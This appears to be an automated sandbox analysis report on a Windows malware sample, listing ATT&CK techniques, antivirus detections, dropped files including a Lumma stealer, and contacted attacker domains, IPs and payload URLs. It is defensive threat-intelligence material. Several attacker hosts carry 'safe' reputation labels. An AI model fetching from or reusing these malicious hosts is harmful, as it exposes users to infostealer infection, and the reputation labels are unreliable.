Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Network Share Discovery	Distributed Component Object Model	2 Clipboard Data	125 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	551 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	22 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	812 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
3.exe	47%	Virustotal		Browse
3.exe	100%	Avira	HEUR/AGEN.1311176
3.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\rcjjrra	100%	Avira	HEUR/AGEN.1311176
C:\Users\user\AppData\Local\Temp\A247.exe	100%	Avira	TR/AVI.AceCrypter.javlp
C:\Users\user\AppData\Roaming\rcjjrra	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\A247.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\5358.exe	100%	Joe Sandbox ML
C:\ProgramData\DGHIECGCBKFH\freebl3.dll	0%	ReversingLabs
C:\ProgramData\DGHIECGCBKFH\mozglue.dll	0%	ReversingLabs
C:\ProgramData\DGHIECGCBKFH\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\DGHIECGCBKFH\nss3.dll	0%	ReversingLabs
C:\ProgramData\DGHIECGCBKFH\softokn3.dll	0%	ReversingLabs
C:\ProgramData\DGHIECGCBKFH\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\A247.exe	96%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Temp\kat2225.tmp	4%	ReversingLabs
C:\Users\user\AppData\Roaming\rcjjrra	37%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
whispedwoodmoodsksl.shop	17%	Virustotal	Browse
steamcommunity.com	0%	Virustotal	Browse
dbfhns.in	5%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://www.youtube.com	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://www.youtube.com/	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://word.office.comon	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
https://broadcast.st.dl.eccdnx.com	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://65.109.242.59/vcruntime140.dllv	0%	Avira URL Cloud	safe
https://65.109.242.59/y	0%	Avira URL Cloud	safe
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV	0%	Avira URL Cloud	safe
https://login.steampowered.com/	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli	0%	URL Reputation	safe
https://api.steampowered.com/	0%	URL Reputation	safe
https://store.steampowered.com/mobile	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV	0%	Virustotal		Browse
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	Avira URL Cloud	safe
https://65.109.242.59CGII	0%	Avira URL Cloud	safe
https://65.109.242.59/y	0%	Virustotal		Browse
whispedwoodmoodsksl.shop	100%	Avira URL Cloud	malware
http://guteyr.cc/tmp/index.php	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://65.109.242.59/vcruntime140.dllT	0%	Avira URL Cloud	safe
https://whispedwoodmoodsksl.shop/(	100%	Avira URL Cloud	malware
https://65.109.242.59/nss3.dll	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://65.109.242.59/p	0%	Avira URL Cloud	safe
https://s.ytimg.com;	0%	Avira URL Cloud	safe
whispedwoodmoodsksl.shop	17%	Virustotal		Browse
https://t.me/copterwin	0%	Avira URL Cloud	safe
https://whispedwoodmoodsksl.shop/(	16%	Virustotal		Browse
https://65.109.242.59/t	0%	Avira URL Cloud	safe
https://65.109.242.59/s	0%	Avira URL Cloud	safe
https://65.109.242.59/r	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
https://65.109.242.59/s	14%	Virustotal		Browse
http://guteyr.cc/tmp/index.php	13%	Virustotal		Browse
https://65.109.242.59/?	0%	Avira URL Cloud	safe
https://65.109.242.59/B	0%	Avira URL Cloud	safe
https://t.me/copterwinr0isMozilla/5.0	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
https://65.109.242.59/vcruntime140.dll?	0%	Avira URL Cloud	safe
https://t.me/copterwin	1%	Virustotal		Browse
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&	0%	Avira URL Cloud	safe
https://65.109.242.59/t	4%	Virustotal		Browse
https://65.109.242.59/r	6%	Virustotal		Browse
https://t.me/copterwinr0isMozilla/5.0	0%	Virustotal		Browse
https://65.109.242.59/F	0%	Avira URL Cloud	safe
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&	0%	Virustotal		Browse
https://65.109.242.59/L	0%	Avira URL Cloud	safe
https://65.109.242.59/p	0%	Virustotal		Browse
https://65.109.242.59/vcruntime140.dllD	0%	Avira URL Cloud	safe
https://65.109.242.59/B	0%	Virustotal		Browse
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js	0%	Avira URL Cloud	safe
https://65.109.242.59/F	0%	Virustotal		Browse
https://65.109.242.59/K	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://65.109.242.59/vcruntime140.dllB	0%	Avira URL Cloud	safe
https://65.109.242.59/L	0%	Virustotal		Browse
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
https://65.109.242.59/O	0%	Avira URL Cloud	safe
https://65.109.242.59/freebl3.dll	0%	Avira URL Cloud	safe
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js	0%	Virustotal		Browse
https://65.109.242.59/K	6%	Virustotal		Browse
http://45.129.96.86/file/update.exe	100%	Avira URL Cloud	malware
https://65.109.242.59/vcruntime140.dllO	0%	Avira URL Cloud	safe
https://65.109.242.59/l3.dll	0%	Avira URL Cloud	safe
https://whispedwoodmoodsksl.shop/_o5e	100%	Avira URL Cloud	malware
http://45.129.96.86/file/update.exe	20%	Virustotal		Browse
https://65.109.242.59/O	6%	Virustotal		Browse
https://www.google.com/recaptcha/	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199689717899	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://whispedwoodmoodsksl.shop/r	100%	Avira URL Cloud	malware
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
whispedwoodmoodsksl.shop	188.114.96.3	true	true	17%, Virustotal, Browse	unknown
steamcommunity.com	23.67.133.187	true	true	0%, Virustotal, Browse	unknown
dbfhns.in	190.187.52.42	true	true	5%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
whispedwoodmoodsksl.shop	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://guteyr.cc/tmp/index.php	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/nss3.dll	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/freebl3.dll	false	Avira URL Cloud: safe	unknown
http://45.129.96.86/file/update.exe	true	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199689717899	true	Avira URL Cloud: safe	unknown
https://65.109.242.59/mozglue.dll	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
holicisticscrarws.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/y	kat2225.tmp, 00000009.00000003.2847534612.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848187053.000000000084D000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/vcruntime140.dllv	kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV	kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr	false	Avira URL Cloud: safe	unknown
https://65.109.242.59CGII	kat2225.tmp, 00000009.00000002.3157954757.000000000052E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.gstatic.cn/recaptcha/	kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli	kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
http://www.valvesoftware.com/legal.htm	kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
https://www.youtube.com	kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://65.109.242.59/vcruntime140.dllT	kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://whispedwoodmoodsksl.shop/(	A247.exe, 00000005.00000003.2384817568.0000000000909000.00000004.00000020.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
https://65.109.242.59/p	kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2847534612.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848187053.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://s.ytimg.com;	kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/copterwin	5358.exe, 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, 5358.exe, 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/t	kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/s	kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2719695430.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	false	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/r	kat2225.tmp, 00000009.00000003.2766326619.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2719695430.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2735078163.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2750844000.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000000.2042908810.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2042908810.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/?	kat2225.tmp, 00000009.00000003.2985940074.00000000007D6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&	kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
https://65.109.242.59/B	kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/copterwinr0isMozilla/5.0	kat2225.tmp, 00000009.00000002.3157954757.0000000000422000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/vcruntime140.dll?	kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&	kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/F	kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/L	kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/vcruntime140.dllD	kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js	kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/K	kat2225.tmp, 00000009.00000003.2847534612.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848187053.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/vcruntime140.dllB	kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/P	kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.rootca1.amazontrust.com0:	A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/O	kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	false	URL Reputation: safe	unknown
https://lv.queniujq.cn	kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com/	kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://65.109.242.59/vcruntime140.dllO	kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
https://65.109.242.59/l3.dll	kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://whispedwoodmoodsksl.shop/_o5e	A247.exe, 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
https://www.google.com/recaptcha/	kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://checkout.steampowered.com/	kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	GDHIII.9.dr	false	URL Reputation: safe	unknown
https://whispedwoodmoodsksl.shop/r	A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b	kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
https://whispedwoodmoodsksl.shop/%%	A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
https://65.109.242.59/~;	kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.comon	explorer.exe, 00000002.00000000.2038509404.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.steampowered.com/en/	kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	GIIDBG.9.dr	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/mo	kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
